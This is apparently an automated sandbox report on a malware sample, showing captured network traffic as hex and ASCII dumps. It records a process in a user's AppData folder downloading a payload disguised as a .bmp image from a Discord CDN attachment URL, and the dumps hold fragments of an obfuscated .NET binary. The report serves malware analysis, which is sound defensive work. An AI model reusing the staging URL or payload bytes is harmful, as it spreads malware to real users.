3c 3d 72 8f 43 48 89 a4 8a 9c 25 36 aa 40 0c 05 1e 3a 7c 34 67 5a bd
                                                      Data Ascii: QQ|^>m^8(JOi5.F${PO2`}hMqk:20s\}2[PfR;8!U/hom=BiZ}vq,O^0z:(IAt/"\FU\4sv3*C\)+LW6/e!e0Q_;%om3y:<=rCH%6@:|4gZ
                                                      2022-05-14 13:17:12 UTC622INData Raw: 4a e0 3b 81 a0 0f 10 48 90 51 1b 94 90 6a 62 38 77 ea 43 b5 fe 0b 0e 6e 36 47 a5 90 6c e1 56 bc 45 bb 84 2e b2 a9 77 21 f6 33 02 6e 0f e9 98 81 8f 72 43 b1 5b 8c bc c2 ce a2 93 93 d6 f2 a8 ec b9 3c 62 33 82 6c 8b 95 26 b0 89 43 15 03 7b 58 f1 e1 04 b6 77 9c 2e ac bd c2 d5 31 07 65 2b d7 ee d0 1c 50 37 89 16 03 32 25 e0 7a 5e 7b 28 1a 1d c8 6b f9 29 c5 a5 c2 5e c2 20 f1 0a 4d 93 cc 9a 39 7a c8 e8 24 d8 f6 5d 55 a2 ac 5a 48 4f 17 c8 49 88 08 01 63 54 99 ae 0d e4 d9 53 6b d0 c8 e2 2b 6a e9 fb 24 1d 5a dd 49 57 dd b3 f4 22 14 f7 3b 20 b7 3a 39 e3 12 7b 56 cb a1 62 cb 14 98 fa 6d 5e da 15 14 e6 12 44 3a 76 55 25 30 09 ea a0 00 3a b8 ea 33 58 41 12 94 1b e5 d0 62 1e 35 20 3f 1f 6e 2e 70 2f 9b 40 0b 4a 49 05 30 27 bf ba ed 73 81 13 a8 5b 2f 59 63 9e eb 0b 0d f8
                                                      Data Ascii: J;HQjb8wCn6GlVE.w!3nrC[<b3l&C{Xw.1e+P72%z^{(k)^ M9z$]UZHOIcTSk+j$ZIW"; :9{Vbm^D:vU%0:3XAb5 ?n.p/@JI0's[/Yc
                                                      2022-05-14 13:17:12 UTC626INData Raw: c9 35 ef 2f 17 b0 ef 4d 27 34 d4 aa a7 72 da 2a 5c aa bd 3c 26 c7 2d 0c 4f 3d 9d de a6 6c fd 20 6d bd a8 53 fb fb 73 79 07 3a 9d 37 53 76 76 f2 50 5c 46 8d 3e e6 cf e1 25 db 77 16 82 5d b7 81 9c 1c 20 1c 8d 93 6d d6 b1 85 ac 7f 46 23 73 76 f6 45 58 b2 0b 46 35 58 a2 53 b9 4f b8 9d bf b2 9c e3 ed 12 4f 4c bf 9e 73 6b 73 c6 cd e1 a4 c1 4b d7 36 3d 53 6e ee 3e d1 86 67 d6 75 37 41 61 16 c6 20 68 7c 93 ba db 89 a6 6e f9 2f 96 4b a6 23 38 e5 ec 4f 43 47 77 23 e9 b7 68 ab 59 4d fa cc 3a 4d 55 2e 7c 6a 2a ae 47 b7 ba 3e 74 c7 b3 97 c8 87 9c 09 54 14 92 a0 cf 86 39 45 e2 87 2b 62 11 67 04 07 00 6a bf 9a a0 d5 16 54 ea ae 70 80 64 4f 87 10 df 90 25 19 44 25 2f 23 a0 a9 25 7e 78 32 93 26 de e1 3e c0 26 92 e2 83 0d 89 aa 24 4d 10 60 ad 97 7d c9 a2 37 55 3d d1 80 dd
                                                      Data Ascii: 5/M'4r*\<&-O=l mSsy:7SvvP\F>%w] mF#svEXF5XSOOLsksK6=Sn>gu7Aa h|n/K#8OCGw#hYM:MU.|j*G>tT9E+bgjTpdO%D%/#%~x2&>&$M`}7U=
                                                      2022-05-14 13:17:12 UTC637INData Raw: f4 f4 9b c9 97 90 a9 68 56 76 44 1f e0 45 77 15 eb f0 80 cc f5 97 5c 2d eb 24 12 56 50 81 4b 64 2b 5d 63 56 bc 1f 1b 35 de b9 a8 7d a0 79 46 4d ba 97 16 0a 4f e7 75 c2 e0 6d a5 f0 04 2d 47 17 41 ce d1 25 b7 a4 2f 63 0f 61 3f 85 df 2f c6 25 8b 0f fb 95 3b 13 23 7c 0f 73 24 ec ab 06 5d 46 6a 5f bf 8f fd 13 c2 cd aa c9 b9 a4 d4 19 e1 79 96 ff d7 13 b9 ad 01 a2 e7 ee fb 7e 4c 86 4c be 26 f0 5e c4 a0 97 d8 e6 59 bc 5e a0 11 7c 7e b5 04 eb f9 90 c3 a6 5c 48 bd 13 ff 5d 53 70 8a 7c d9 56 91 c6 16 0d a2 d1 d6 c0 5a ed 93 74 a6 7b 89 33 32 cd 11 d5 7d b8 87 90 03 24 58 ca 57 d9 6c cd 80 bb 54 9f ef d1 8f 2b 07 20 c6 e5 80 6c b2 f8 ad 23 ff 64 81 ff f3 08 61 19 48 4a 0f b9 4f 02 1d b3 3d d1 d4 2d 17 e7 2d 2d 1e 83 eb a7 ce 6a f0 cd 1f e4 12 0c e5 d5 de ce 3e 21 dc
                                                      Data Ascii: hVvDEw\-$VPKd+]cV5}yFMOum-GA%/ca?/%;#|s$]Fj_y~LL&^Y^|~\H]Sp|VZt{32}$XWlT+ l#daHJO=---j>!
                                                      2022-05-14 13:17:12 UTC642INData Raw: 33 0b a1 ab 9a 9c e6 82 00 87 9d e2 ee b4 69 25 30 29 7f 83 59 2d 53 fa 17 39 ff 59 cb ee 80 b4 b3 2c 6f 5b ac f6 53 aa 37 5b 2c de 1a a5 62 14 ac 37 32 7c 94 20 dc 73 fe c4 6b de c1 1f fa 70 81 bc f7 da f0 59 f4 ae b3 02 d2 98 4a b7 b6 79 6f 76 d8 0c 12 0c 0f 8f 8a 35 d8 2c 9a bf 79 4b a5 13 3b 21 7c 7c 93 e9 5b 08 53 c2 29 96 33 1b 46 52 43 b2 ad ce cf b0 5d a8 ec 2d 8b 59 40 0b a5 da 91 6c e7 3d 7c 3c 53 6d 45 80 a5 c3 35 20 df 92 df 27 78 77 6f 05 63 3c 67 ae 3a 65 af 80 2f e5 24 75 e8 98 cb 00 5c 78 ab 19 8b ed 1f bf a6 bb 35 74 8e 27 eb e3 b9 cb 75 55 d8 ef c2 6d 66 78 87 ad 6f 55 ed 96 eb 03 2d 1b 85 f2 93 56 b5 f8 f9 08 5e f3 30 bd 87 12 8d 03 8f ab 04 ce f9 e3 85 fe b3 0c ef 41 4f 87 7d 4e ed 8b 9e f8 dd 9d 78 f2 81 e3 1b 3a 9b 74 92 5f d9 46 b8
                                                      Data Ascii: 3i%0)Y-S9Y,o[S7[,b72| skpYJyov5,yK;!||[S)3FRC]-Y@l=|<SmE5 'xwoc<g:e/$u\x5t'uUmfxoU-V^0AO}Nx:t_F
                                                      2022-05-14 13:17:12 UTC658INData Raw: 81 3d d7 f8 ec 66 68 9b db b8 77 67 a8 2b a7 52 2c 5a 5f bb 31 13 69 7d 88 ec e3 87 0d 3a be a0 38 d2 b8 21 5c c8 90 2c 56 78 75 b8 42 db b6 23 12 bd 40 25 28 2b 3c 54 4a 17 16 f8 fa d7 00 47 cd b3 4f 1a 88 58 b2 57 c6 36 81 5b b3 31 fe 10 3d 20 29 65 91 24 e8 61 8e 7a a1 bd 2f 57 2e 83 4d bd c2 d0 63 3b 72 28 fc fa 61 d7 82 a3 07 ca 3d cd f9 a0 7e 4f 28 a1 fe 55 c2 8b 0e 9e ad 34 cb 10 b3 5c 9f 96 d4 33 ed aa 26 7a 91 92 1c 9a d0 ec 16 7b 43 2f 2e 27 69 e8 4d 67 6f 4d 21 cc ae 87 6d 21 32 69 c0 90 91 0c 99 da e7 5a 09 80 89 a8 90 d6 c4 db fd 17 72 62 40 6f 2e 92 45 f3 e5 00 43 9a 77 94 f4 1e 47 a8 06 8f 4a 6a 54 ce 49 e5 89 16 fd 26 bd 99 02 56 b6 65 ee ca 2e ac 73 0c 25 62 da 26 1c 67 6c da 25 9d d2 fd 93 fa 36 75 3c 99 e4 6c ef 2a 2f e2 1d a6 a9 db 9b
                                                      Data Ascii: =fhwg+R,Z_1i}:8!\,VxuB#@%(+<TJGOXW6[1= )e$az/W.Mc;r(a=~O(U4\3&z{C/.'iMgoM!m!2iZrb@o.ECwGJjTI&Ve.s%b&gl%6u<l*/
                                                      2022-05-14 13:17:12 UTC669INData Raw: 00 0c 08 7d 12 18 08 03 00 07 94 83 12 05 1d 01 02 00 08 18 09 18 18 09 10 4c 11 05 00 0a 98 83 12 01 01 00 06 05 1d 48 82 12 01 00 07 18 18 18 18 18 4c 11 05 00 09 08 7d 12 18 18 09 04 00 08 9c 83 12 08 01 00 06 9c 83 12 9c 83 12 01 02 00 09 08 cc 81 12 08 02 03 00 08 09 18 10 18 10 18 09 18 18 06 00 0b 18 40 11 10 48 11 09 10 09 4c 11 05 00 0d 18 09 10 4c 11 02 00 07 88 83 12 01 01 00 06 09 18 10 09 09 10 ac 80 11 18 18 4c 11 07 00 0f 09 18 8c 81 11 10 18 18 04 00 0a 05 1d 05 1d 05 1d 05 1d 03 00 0a b9 80 12 b9 80 12 01 02 00 09 84 82 12 80 82 12 29 12 29 12 29 12 08 01 06 00 10 08 08 18 02 00 05 98 80 11 84 81 11 10 18 10 80 81 11 10 4c 11 04 00 11 08 01 09 10 09 18 18 02 04 00 08 08 84 83 12 08 02 00 07 18 09 18 01 03 00 06 7d 12 18 09 18 18 04 00 08
                                                      Data Ascii: }LHL}@HLLL)))L}
                                                      2022-05-14 13:17:12 UTC685INData Raw: 62 4f 74 6e 65 6d 65 67 61 6e 61 4d 00 6e 6f 69 74 63 65 6c 6c 6f 43 74 63 65 6a 62 4f 74 6e 65 6d 65 67 61 6e 61 4d 00 74 6e 65 6d 65 67 61 6e 61 4d 2e 6d 65 74 73 79 53 00 02 1d 7e 00 73 74 73 69 78 45 5f 74 65 67 00 02 1c 7e 00 74 78 65 4e 65 76 6f 4d 00 02 1b 7e 00 65 6c 64 6e 61 48 5f 74 65 67 00 02 1a 7e 00 73 73 65 72 64 64 41 65 73 61 42 5f 74 65 67 00 02 19 7e 00 73 6c 61 75 71 45 00 02 18 7e 00 6e 6f 73 69 72 61 70 6d 6f 43 67 6e 69 72 74 53 00 02 17 7e 00 74 6e 65 72 72 75 43 5f 74 65 67 00 02 16 7e 00 72 6f 74 61 72 65 6d 75 6e 45 49 00 72 6f 74 61 72 65 6d 75 6e 45 74 65 47 00 73 6e 6f 69 74 63 65 6c 6c 6f 43 2e 6d 65 74 73 79 53 00 65 73 61 42 6e 6f 69 74 63 65 6c 6c 6f 43 79 6c 6e 4f 64 61 65 52 00 02 15 7e 00 6e 6f 69 74 63 65 6c 6c 6f 43
                                                      Data Ascii: bOtnemeganaMnoitcelloCtcejbOtnemeganaMtnemeganaM.metsyS~stsixE_teg~txeNevoM~eldnaH_teg~sserddAesaB_teg~slauqE~nosirapmoCgnirtS~tnerruC_teg~rotaremunEIrotaremunEteGsnoitcelloC.metsySesaBnoitcelloCylnOdaeR~noitcelloC
                                                      2022-05-14 13:17:12 UTC701INData Raw: 13 06 c4 00 09 08 0e 06 c0 00 09 08 09 06 bc 00 09 08 04 06 b8 00 09 07 ff 06 b4 00 09 07 fa 06 b0 00 09 07 f5 06 ac 00 09 07 f0 06 a8 00 09 07 eb 06 a4 00 09 07 e6 06 a0 00 09 07 e1 06 9c 00 09 07 dc 06 98 00 09 07 d7 06 94 00 09 07 d2 06 90 00 09 07 cd 06 8c 00 09 07 c8 06 88 00 09 07 c8 06 84 00 09 07 c3 06 80 00 09 07 c3 06 7c 00 09 07 be 06 78 00 09 07 b9 06 74 00 09 07 b4 06 70 00 09 07 af 06 6c 00 09 01 48 06 68 00 09 07 aa 06 64 00 09 00 ba 06 60 00 09 00 42 06 5c 00 09 07 a1 06 54 00 09 07 9c 06 50 00 09 07 97 06 4c 00 09 07 92 06 48 00 09 07 8d 06 44 00 09 07 88 06 40 00 09 07 83 06 3c 00 09 07 7e 06 38 00 09 07 79 06 34 00 09 07 74 06 30 00 09 07 6f 06 2c 00 09 07 6a 06 28 00 09 07 65 06 24 00 09 07 60 06 20 00 09 07 5b 06 1c 00 09 07 56 06 18
                                                      Data Ascii: |xtplHhd`B\TPLHD@<~8y4t0o,j(e$` [V
                                                      2022-05-14 13:17:12 UTC717INData Raw: 4e 18 10 00 00 00 01 40 f8 05 75 20 ea 28 e3 00 46 00 03 00 00 00 00 05 75 12 43 30 55 18 06 00 03 00 00 00 00 05 75 0b d5 30 4e 18 10 00 00 00 01 40 e8 05 75 20 e2 28 e3 00 46 00 03 00 00 00 00 05 75 12 43 30 55 18 06 00 03 00 00 00 00 05 75 0b d5 30 4e 18 10 00 00 00 01 40 d8 05 75 20 dc 28 e3 00 46 00 03 00 00 00 00 05 75 12 43 30 55 18 06 00 03 00 00 00 00 05 75 0b d5 30 4e 18 10 00 00 00 01 40 c8 05 75 20 d6 28 e3 00 46 00 03 00 00 00 00 05 75 12 43 30 55 18 06 00 03 00 00 00 00 05 75 0b d5 30 4e 18 10 00 00 00 01 40 b8 05 75 20 d0 28 e3 00 46 00 03 00 00 00 00 05 75 12 43 30 55 18 06 00 03 00 00 00 00 05 75 0b d5 30 4e 18 10 00 00 00 01 40 a8 05 75 17 31 28 e3 00 46 00 03 00 00 00 00 05 75 12 43 30 55 18 06 00 03 00 00 00 00 05 75 0b d5 30 4e 18 10
                                                      Data Ascii: N@u (FuC0Uu0N@u (FuC0Uu0N@u (FuC0Uu0N@u (FuC0Uu0N@u (FuC0Uu0N@u1(FuC0Uu0N
                                                      2022-05-14 13:17:12 UTC733INData Raw: 36 01 33 0a 51 00 36 01 33 0a 4c 00 36 01 33 0a 47 00 36 01 33 0a 42 00 36 01 33 09 6f 01 a3 00 93 09 6f 00 c1 00 93 0a 1f 00 69 80 56 0a 1f 00 67 80 56 0a 1f 00 65 80 56 0a 1f 00 36 80 56 00 13 03 19 06 06 0a 02 00 67 80 56 0a 02 00 65 80 56 0a 02 00 36 80 56 00 13 03 19 06 06 0a 16 00 6b 80 56 0a 16 00 69 80 56 0a 16 00 67 80 56 0a 16 00 65 80 56 0a 16 00 36 80 56 00 13 03 19 06 06 09 6f 00 36 00 93 0a 3e 00 36 00 11 0a 3a 00 36 00 13 09 80 00 36 00 11 0a 32 00 36 00 16 0a 2d 00 36 00 36 00 13 00 36 00 06 09 6f 00 ca 00 93 0a 29 00 67 00 03 0a 29 00 65 00 03 0a 29 00 36 00 03 00 13 00 36 00 03 0a 24 00 36 00 03 09 6f 00 a6 00 93 09 16 00 36 00 01 00 13 00 36 00 01 0a 1f 00 36 00 01 08 59 00 36 00 01 08 59 00 a2 00 01 09 16 00 51 00 01 09 1e 00 36 00 01
                                                      Data Ascii: 63Q63L63G63B63ooiVgVeV6VgVeV6VkViVgVeV6Vo6>6:6626-666o)g)e)66$6o666Y6YQ6
                                                      2022-05-14 13:17:12 UTC749INData Raw: 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 36 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 35 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 34 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 33 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 32 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 31 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 30 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 2f 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 2e 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 2d 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 2c 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 2b 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 2a 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 29 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 28 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 27
                                                      Data Ascii: >+(*+6 >+(*+5 >+(*+4 >+(*+3 >+(*+2 >+(*+1 >+(*+0 >+(*+/ >+(*+. >+(*+- >+(*+, >+(*++ >+(*+* >+(*+) >+(*+( >+(*+'
                                                      2022-05-14 13:17:12 UTC765INData Raw: 0b ff ff ff 4b 38 06 ff ff ff 44 38 04 ff ff ff 3d 38 02 ff ff ff 36 38 03 ff ff ff 2d 38 06 ff ff ff 2d 38 0a 2a 46 58 1c 06 00 2b 52 46 58 1a 06 58 1c 06 54 01 00 00 9b a5 9a 19 07 05 7a 0a 00 01 2a 73 06 00 02 d8 28 04 00 05 6a 7e 10 2c 46 58 1b 06 52 01 fe 16 46 58 1a 06 58 1b 06 52 01 00 00 9e a5 06 00 01 a0 28 08 04 11 01 12 17 09 16 58 1a 06 04 13 06 00 02 cc 28 02 00 00 4c d0 04 00 05 65 7e 0d 06 00 02 9d 28 06 66 ad 05 20 04 00 04 56 7e 00 00 00 a5 38 00 00 00 a0 38 06 66 c2 14 20 04 00 04 56 7e 00 00 00 a9 38 a2 01 00 00 9b 8c 4b 00 00 00 af 38 19 25 a2 01 00 00 9b 8c 00 00 00 b6 38 18 25 a2 01 00 00 3a 8c 00 00 00 bd 38 17 25 a2 01 00 00 19 8c 00 00 00 c4 38 16 25 01 00 00 01 8d 1a 54 16 00 00 00 cd 38 00 26 00 00 00 ce 39 16 e0 0f fe 1d 11 00
                                                      Data Ascii: K8D8=868-8-8*FX+RFXXTz*s(j~,FXRFXXR(X(Le~(f V~88f V~8K8%8%:8%8%T8&9
                                                      2022-05-14 13:17:12 UTC781INData Raw: 03 fe 16 04 00 02 61 7b 0a 11 58 0d 1f 06 0c 13 0a 00 01 07 7e 0a 13 02 00 00 21 a5 0a 00 00 57 28 0a 00 00 01 28 02 00 00 21 d0 0b 11 00 0b 13 ff ff ff 01 39 1e 0a 00 00 54 28 58 6a 04 00 02 5e 7b 06 11 0a 00 00 55 28 04 11 1d 2c 46 58 0c 1f 06 52 0a 00 00 43 28 0a 00 01 04 7e 0b 11 58 0c 1f 06 ff ff ff 5f 3a 46 58 0b 1f 06 52 04 fe 04 00 02 5f 7b 06 11 4a 58 1a 06 58 0b 1f 06 54 58 17 4a 58 1a 06 58 1a 06 00 0b 13 0a 00 00 54 28 58 5a 6a 4a 58 1a 06 6a 0a 00 00 56 28 02 00 00 21 8c 0a 11 58 6a 04 00 02 5e 7b 06 11 0a 00 00 55 28 ff ff ff 06 3a 16 04 11 31 2c 46 58 0a 1f 06 52 0a 00 01 3c 28 08 11 0a 00 00 75 28 0d 11 58 0a 1f 06 0d 13 0a 00 00 54 28 58 e9 2c 15 5a 6a 4a 58 1a 06 6a 0a 00 00 56 28 02 00 00 21 8c 0a 11 58 6a 04 00 02 5e 7b 06 11 0a 00 00
                                                      Data Ascii: a{X~!W((!9T(Xj^{U(,FXRC(~X_:FXR_{JXXTXJXXT(XZjJXjV(!Xj^{U(:1,FXR<(u(XT(X,ZjJXjV(!Xj^{
                                                      2022-05-14 13:17:12 UTC797INData Raw: ff fe fa 38 06 00 00 ca 28 ff ff fe ff 38 06 ff ff fe ff 38 0a 2a 00 de 00 00 26 ff ff ff 4c 38 0b ff ff ff 4d 38 06 00 03 02 28 ff ff ff 52 38 06 00 03 02 28 ff ff ff 57 38 06 00 02 88 28 29 de 00 00 00 06 00 01 59 28 00 06 00 01 bf 28 00 0e 2c 46 58 17 06 52 01 fe 16 0a 00 01 2e 6f 07 08 58 17 06 00 0a 00 01 2d 6f a2 06 00 02 9d 28 06 66 bb e0 20 04 00 04 56 7e 18 25 a2 06 00 03 02 28 06 00 02 5b 6f 06 00 00 ca 28 04 00 05 92 7e 17 25 a2 0a 00 00 21 6f 0a 00 00 85 28 06 00 02 9d 28 06 66 bb e0 20 04 00 04 56 7e 26 10 2d 25 06 00 02 74 6f 06 00 02 3f 6f 06 00 00 ca 28 16 25 01 00 00 15 8d 19 08 0c 0a 00 01 2c 73 00 00 00 ae 38 00 00 00 a9 38 00 00 00 a4 38 00 00 00 9f 38 04 00 05 90 7e 04 00 05 92 7e 00 00 00 00 00 d9 38 05 2c 46 00 00 01 02 38 52 01 fe
                                                      Data Ascii: 8(88*&L8M8(R8(W8()Y((,FXR.oX-o(f V~%([o(~%!o((f V~&-%to?o(%,s8888~~8,F8R
                                                      2022-05-14 13:17:12 UTC813INData Raw: 16 58 0c 1f 06 1b 13 06 00 03 5c 28 04 00 02 44 7b 12 11 09 11 04 00 05 e6 7e 1a 13 06 00 03 5c 28 04 00 02 44 7b 12 11 0b 11 04 00 05 e6 7e 00 00 00 00 85 39 46 58 26 1f 06 52 06 00 03 0b 28 06 00 02 9d 28 06 66 c0 a3 20 04 00 04 56 7e 06 00 00 26 28 12 12 04 00 05 b1 7e 58 26 1f 06 12 13 02 00 00 1c a5 06 00 03 59 28 06 00 02 cc 28 02 00 00 1c d0 04 00 05 65 7e 06 00 03 5c 28 5a 06 00 03 56 28 02 00 00 1c 8c 12 11 04 00 05 e3 7e 4a 58 1e 06 11 11 04 00 05 e5 7e 04 00 05 e4 7e 00 00 00 01 02 38 54 16 58 1e 06 02 00 00 1c 15 fe 12 12 11 13 06 00 03 5c 28 06 00 02 cf 28 06 00 02 cc 28 02 00 00 17 d0 04 00 05 65 7e 04 00 05 66 7e 06 00 03 5c 28 04 00 01 da 7b 0c 11 0b 11 04 00 05 e5 7e 04 00 05 e5 7e 10 13 02 00 00 1b a5 06 00 03 59 28 06 00 02 cc 28 02 00
                                                      Data Ascii: X\(D{~\(D{~9FX&R((f V~&(~X&Y((e~\(ZV(~JX~~8TX\(((e~f~\({~~Y((


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      4192.168.2.349781162.159.133.233443C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-05-14 13:17:17 UTC822OUTGET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1
                                                      Host: cdn.discordapp.com
                                                      Connection: Keep-Alive
                                                      2022-05-14 13:17:17 UTC822INHTTP/1.1 200 OK
                                                      Date: Sat, 14 May 2022 13:17:17 GMT
                                                      Content-Type: image/x-ms-bmp
                                                      Content-Length: 416768
                                                      Connection: close
                                                      CF-Ray: 70b3e9cb0a799b34-FRA
                                                      Accept-Ranges: bytes
                                                      Age: 83421
                                                      Cache-Control: public, max-age=31536000
                                                      Content-Disposition: attachment;%20filename=Idksgm_Umgkodlw.bmp
                                                      ETag: "c4adc7c987e700a85f16c250fb6e6e03"
                                                      Expires: Sun, 14 May 2023 13:17:17 GMT
                                                      Last-Modified: Fri, 13 May 2022 13:36:28 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: HIT
                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                      x-goog-generation: 1652448988027717
                                                      x-goog-hash: crc32c=TuJfbQ==
                                                      x-goog-hash: md5=xK3HyYfnAKhfFsJQ+25uAw==
                                                      x-goog-metageneration: 1
                                                      x-goog-storage-class: STANDARD
                                                      x-goog-stored-content-encoding: identity
                                                      x-goog-stored-content-length: 416768
                                                      X-GUploader-UploadID: ADPycdscSd6oC8GbGCX6htPZTy8OjzgUlT7J2mqtIVAo3Ipln5m_O6IIVCBEGI5gYDzTygFYU2kqSGfMaBl-8Ag9Tnud6g
                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6KuehKNpKNEZKFrRqI7kwiP94dsDMqgCTHFF5tYGPfQcPxJyuHd4s4fy9RwZEXBZBECnapAL5xlgmBIUk5R6Mz2Qk%2F0I%2B24WFVaqA3yr9Bj%2Ba8Cn1wUpfBGObH5DWMacpQ%2B%2Bhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      2022-05-14 13:17:17 UTC823INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                      Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                      2022-05-14 13:17:17 UTC823INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2022-05-14 13:17:17 UTC825INData Raw: 61 00 72 00 54 00 00 00 04 00 24 00 00 00 00 00 6f 00 66 00 6e 00 49 00 65 00 6c 00 69 00 46 00 72 00 61 00 56 00 01 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 3f 1f e8 74 ab 00 01 00 00 1f e8 74 ab 00 01 00 00 00 01 00 00 fe ef 04 bd 00 00 00 00 00 4f 00 46 00 4e 00 49 00 5f 00 4e 00 4f 00 49 00 53 00 52 00 45 00 56 00 5f 00 53 00 56 00 00 00 34 03 32 00 00 00 00 00 00 03 32 00 06 80 54 00 00 00 48 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 18 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: arT$ofnIeliFraVD?ttOFNI_NOISREV_SV422TH0
                                                      2022-05-14 13:17:17 UTC826INData Raw: 62 14 86 62 6c be 13 42 f2 ae 1c 63 75 94 51 35 fc f1 fe 92 33 2d 24 73 f7 35 25 cc bb a5 12 94 7c ab de 65 92 42 cb 31 4d 1b 4b 4b a5 0f 3d e9 f9 a2 d9 a0 7d ba bc b8 04 19 2f 22 0d 43 32 0f f7 dc d0 aa 52 e9 d9 69 c1 9b ed 81 5f c3 b8 fe de a1 cc 48 04 2c 05 45 98 01 2d 50 aa 82 b3 49 fd a3 67 43 6a 9e 65 1d 30 92 3c 94 5a 47 1f 9d 9c 17 14 9f a2 96 15 50 71 6d e2 63 22 81 41 a9 1e 49 3f 87 1e 83 e9 c2 c6 0e 43 13 a6 ab 3b 73 24 72 0f 8c dc ff 41 02 69 df ef d4 20 4e e5 77 77 49 3c 4e 51 a9 55 2e f8 2d fd a5 c7 4d 26 6b be 22 8c f8 b7 ac aa c2 0b e8 db 1a 0c 99 9c 2a 90 0f db 56 14 fa 15 eb 76 1b c2 78 1d c2 69 21 e4 ce a8 2e 72 af da 90 bd 6b d9 b9 54 cd e8 fe ba 21 be f7 99 80 59 de dd ae 5d 3a 5f 96 2c f1 2e d2 4a 7b 5c cc d7 b4 1b 58 2d 45 09 1b d2
                                                      Data Ascii: bblBcuQ53-$s5%|eB1MKK=}/"C2Ri_H,E-PIgCje0<ZGPqmc"AI?C;s$rAi NwwI<NQU.-M&k"*Vvxi!.rkT!Y]:_,.J{\X-E
                                                      2022-05-14 13:17:17 UTC827INData Raw: 6d d7 2b 83 bb 51 c7 4e 65 7a 4f 57 f5 2a ba eb b1 53 88 ba b5 c0 b2 b5 81 78 1a 04 67 02 9a eb b1 f2 4e c2 63 b3 1b aa 86 80 89 12 5e 29 37 86 7a 94 54 18 6f 48 ee 5d 21 f9 81 26 ff b6 7c ed c4 b7 cd ff 21 70 6b af 92 34 78 e7 7e 00 f4 6b 88 76 2e ba 2f b0 a0 71 58 04 4a af 62 20 fe fe 3c 46 72 45 df 12 20 1a 6d ab 82 de 83 3d f1 ba 83 69 97 a1 8f fe 98 4a 6e 37 e3 90 ec ce 8b 0b 95 1f 90 a5 ad ab 85 64 1c b9 1b c7 8f 98 f4 54 a9 5d 82 cd af 66 01 0e 26 1c b2 61 87 1d c0 ee a2 86 27 17 d1 7e cc db 85 2e a9 22 f9 60 26 81 6f d4 62 52 21 8e df 33 c6 cc 34 b1 a2 7a ff d5 10 73 b5 71 77 24 19 92 9b 46 24 7e 64 0b 4a 73 9d 36 5a 6f 53 03 6d 92 f6 0b a2 4a 4f d0 df b6 97 14 49 78 7f 3c f5 e0 f1 58 fa 53 b8 80 1e 25 4f 68 c7 a8 13 88 4f 1a a6 32 51 de 57 3e 41
                                                      Data Ascii: m+QNezOW*SxgNc^)7zToH]!&|!pk4x~kv./qXJb <FrE m=iJn7dT]f&a'~."`&obR!34zsqw$F$~dJs6ZoSmJOIx<XS%OhO2QW>A
